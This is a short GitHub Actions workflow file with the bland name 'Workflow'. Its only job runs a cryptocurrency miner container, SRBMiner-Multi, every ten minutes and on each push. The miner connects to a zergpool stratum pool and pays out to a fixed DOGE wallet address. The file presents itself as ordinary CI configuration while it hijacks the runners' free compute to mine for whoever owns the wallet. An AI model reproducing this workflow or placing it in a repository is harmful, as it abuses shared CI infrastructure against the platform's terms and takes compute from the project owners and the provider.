name: Workflow

on:
  workflow_dispatch:
  push:
  schedule:
    - cron: "*/10 * * * *"

jobs:
  run:
    runs-on: ubuntu-latest
    container: cniweb/srbminer-multi:latest
    timeout-minutes: 10
    steps:
      - name: run
        run: /opt/SRBMiner-Multi/SRBMiner-MULTI --algorithm yespowerLTNCG --pool stratum+tcp://yespowerLTNCG.mine.zergpool.com:6239 --wallet DFgN9Wf6AwSiRPskC5PJWBvafecAZEjbho --password c=DOGE,mc=CRNC,ID=${{ github.repository_owner }}-git --api-enable --api-port 80 --disable-auto-affinity --disable-gpu --cpu_threads 0
